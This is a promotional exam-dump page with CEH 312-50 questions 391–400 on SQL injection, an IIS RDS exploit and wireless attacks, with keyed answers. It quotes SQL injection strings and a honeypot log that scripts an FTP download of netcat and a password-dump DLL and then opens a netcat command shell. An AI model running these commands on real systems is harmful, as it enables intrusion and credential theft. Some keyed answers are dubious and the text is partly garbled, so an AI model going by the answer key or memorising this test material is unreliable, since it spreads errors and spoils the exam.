[Free] 2018(Jan) EnsurePass Testking ECCouncil 312-50 Dumps with VCE and PDF 391-400

Ensurepass.com : Ensure you pass the IT Exams
2018 Jan ECCouncil Official New Released 312-50
100% Free Download! 100% Pass Guaranteed!

Ethical Hacking and Countermeasures

Question No: 391 – (Topic 14)

Bank of Timbuktu was a medium-sized, regional financial institution in Timbuktu. The bank has deployed a new Internet-accessible Web application recently, using which customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser.

John Stevens was in charge of information security at Bank of Timbuktu. After one month in production, several customers complained about the Internet enabled banking application. Strangely, the account balances of many bank’s customers has been changed! However, money hadn’t been removed from the bank. Instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application’s logs and found the following entries:

Attempted login of unknown user: John Attempted login of unknown user: sysaR

Attempted login of unknown user: sencat Attempted login of unknown user: pete ”; Attempted login of unknown user: ‘ or 1=1-

Attempted login of unknown user: ‘; drop table logins- Login of user jason, sessionID= 0x75627578626F6F6B Login of user daniel, sessionID= 0x98627579539E13BE Login of user rebecca, sessionID= 0x90627579944CCB811 Login of user mike, sessionID= 0x9062757935FB5C64 Transfer Funds user jason

Pay Bill user mike Logout of user mike

What kind of attack did the Hacker attempt to carry out at the bank? (Choose the best answer)

  1. The Hacker attempted SQL Injection technique to gain access to a valid bank login ID.

  2. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason’s session.

  3. The Hacker attempted a brute force attack to guess login ID and password using password cracking tools.

  4. The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability.

Answer: A

Explanation: The following part: Attempted login of unknown user: pete ”; Attempted login of unknown user: ‘ or 1=1-

Attempted login of unknown user: ‘; drop table logins-

Clearly shows a hacker trying to perform a SQL injection by bypassing the login with the statement 1=1 and then dumping the logins table.

Question No: 392 – (Topic 14)

Bill is attempting a series of SQL queries in order to map out the tables within the database that he is trying to exploit.

Choose the attack type from the choices given below.

  1. Database Fingerprinting

  2. Database Enumeration

  3. SQL Fingerprinting

  4. SQL Enumeration

Answer: A

Explanation: He is trying to create a view of the characteristics of the target database, he is taking it’s fingerprints.

Question No: 393 – (Topic 14)

Your boss is attempting to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database. What would you call such an attack?

  1. SQL Input attack

  2. SQL Piggybacking attack

  3. SQL Select attack

  4. SQL Injection attack

Answer: D

Explanation: This technique is known as SQL injection attack

Question No: 394 – (Topic 14)

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below:

“cmd1.exe /c open gt;ftpcom” “cmd1.exe /c echo johna2k gt;gt;ftpcom” “cmd1.exe /c echo haxedj00 gt;gt;ftpcom” “cmd1.exe /c echo get nc.exe gt;gt;ftpcom” “cmd1.exe /c echo get samdump.dll gt;gt;ftpcom” “cmd1.exe /c echo quit gt;gt;ftpcom”

“cmd1.exe /c ftp -s:ftpcom”

“cmd1.exe /c nc -l -p 6969 e-cmd1.exe”

What can you infer from the exploit given?

  1. It is a local exploit where the attacker logs in using username johna2k.

  2. There are two attackers on the system – johna2k and haxedj00.

  3. The attack is a remote exploit and the hacker downloads three files.

  4. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.

Answer: C

Topic 15, Hacking Wireless Networks

Question No: 395 – (Topic 15)

Which of the following is true of the wireless Service Set ID (SSID)? (Select all that apply.)

  1. Identifies the wireless network

  2. Acts as a password for network access

  3. Should be left at the factory default setting

  4. Not broadcasting the SSID defeats NetStumbler and other wireless discovery tools

Answer: A,B

Question No: 396 – (Topic 15)

Jacob would like your advice on using a wireless hacking tool that can save him time and get him better results with lesser packets. You would like to recommend a tool that uses KoreK#39;s implementation. Which tool would you recommend from the list below?

  1. Kismet

  2. Shmoo

  3. Aircrack

  4. John the Ripper

Answer: C

Explanation: Implementing KoreK#39;s attacks as well as improved FMS, aircrack provides the fastest and most effective statistical attacks available. John the Ripper is a password cracker, Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system, and

Question No: 397 – (Topic 15)

In order to attack a wireless network, you put up an access point and override the signal of the real access point. As users send authentication data, you are able to capture it. What kind of attack is this?

  1. WEP attack

  2. Drive by hacking

  3. Rogue access point attack

  4. Unauthorized access point attack

Answer: C

Explanation: The definition of a Rogue access point is:1. A wireless access point (AP) installed by an employee without the consent of the IT department. Without the proper security configuration, users have exposed their company#39;s network to the outside world.2. An access point (AP) set up by an attacker outside a facility with a wireless network. Also called an quot;evil twin,quot; the rogue AP picks up beacons (signals that advertise its presence) from the company#39;s legitimate AP and transmits identical beacons, which some client machines inside the building associate with.

Question No: 398 – (Topic 15)

802.11b is considered a protocol.

  1. Connectionless

  2. Secure

  3. Unsecure

  4. Token ring based

  5. Unreliable

Answer: C

Explanation: 802.11b is an insecure protocol. It has many weaknesses that can be used by a hacker.

Question No: 399 – (Topic 15)

Matthew re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Matthew assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs. What is this attack most appropriately called?

  1. Spoof attack

  2. Replay attack

  3. Injection attack

  4. Rebound attack

Answer: B

Explanation: A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it, possibly as part of a masquerade attack by IP packet substitution (such as stream cipher attack).

Question No: 400 – (Topic 15)

On wireless networks, SSID is used to identify the network. Why are SSID not considered to be a good security mechanism to protect a wireless networks?

  1. The SSID is only 32 bits in length.

  2. The SSID is transmitted in clear text.

  3. The SSID is the same as the MAC address for all vendors.

  4. The SSID is to identify a station, not a network.

Answer: B

Explanation: The SSID IS constructed to identify a network, it IS NOT the same as the

MAC address and SSID’s consists of a maximum of 32 alphanumeric characters.

100% Ensurepass Free Download!
Download Free Demo:312-50 Demo PDF
100% Ensurepass Free Guaranteed!
312-50 Dumps

EnsurePass ExamCollection Testking
Lowest Price Guarantee Yes No No
Up-to-Dated Yes No No
Real Questions Yes No No
Explanation Yes No No
Free VCE Simulator Yes No No
Instant Download Yes No No

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.